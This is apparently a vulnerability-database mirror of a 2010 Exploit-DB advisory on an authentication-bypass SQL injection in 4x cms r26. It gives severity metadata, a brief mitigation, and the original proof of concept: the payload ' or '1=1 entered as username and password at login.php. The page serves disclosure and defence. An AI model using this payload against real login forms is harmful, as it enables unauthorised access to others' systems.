header-logo
Suggest Exploit
vendor:
4xcms
by:
cr4wl3r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: 4xcms
Affected Version From: r26
Affected Version To: r26
Patch Exists: YES
Related CWE: N/A
CPE: 4xcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability

4x cms <= r26 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability to bypass authentication and gain access to the application. The PoC for this vulnerability is to use ' or '1=1 as the username and password when logging in.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

=======================================================
4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability
=======================================================


[+] 4xcms <= r26 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11392
[+] Download : http://code.google.com/p/4xcms/downloads/list

[+] PoC: [path]/login.php
    User : ' or '1=1
    Pass : ' or '1=1

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]

Navigation

Suggest Exploit

Services By CQR